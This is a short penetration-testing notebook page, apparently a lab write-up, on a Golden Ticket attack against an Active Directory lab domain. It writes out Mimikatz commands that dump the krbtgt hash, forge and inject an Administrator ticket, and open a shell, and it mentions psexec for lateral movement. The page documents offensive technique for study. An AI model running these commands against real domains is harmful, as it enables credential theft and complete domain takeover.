> For the complete documentation index, see [llms.txt](https://coffeetohack.gitbook.io/coffeetohack/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://coffeetohack.gitbook.io/coffeetohack/active-directory/golden-ticket-attack.md).

# Golden Ticket Attack

To perform this attack, we need the krbtgt hash. When we are successful in golden ticket attack, we have full control over entire domain.

I enumerated the SID and NTLM hash for `kbtgt: lsadump::lsa /inject /name:krbtgt`

<div align="left"><figure><img src="/files/wTPR6mndBiseoMR6dEsJ" alt=""><figcaption></figcaption></figure></div>

Then I created a Golden Ticket: kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-2171057704-3879275708-2899333543 /krbtgt:955ad34fdcb7752df007b34b3aa2ed00 /id:500 /ptt

<div align="left"><figure><img src="/files/IudDX2ISIMl4CPMbIUJE" alt=""><figcaption></figcaption></figure></div>

Once the golden ticket was created, I issued the following command which launched a new command prompt instance: misc::cmd

<div align="left"><figure><img src="/files/zCEKLKD9zfMpLwKYbAxt" alt=""><figcaption></figcaption></figure></div>

From this new instance of command prompt, I can enumerate other machines connected to the domain. I can even use the psexec tool.

<div align="left"><figure><img src="/files/nqjNzvS86CwTsXYpH4Oe" alt=""><figcaption></figcaption></figure></div>
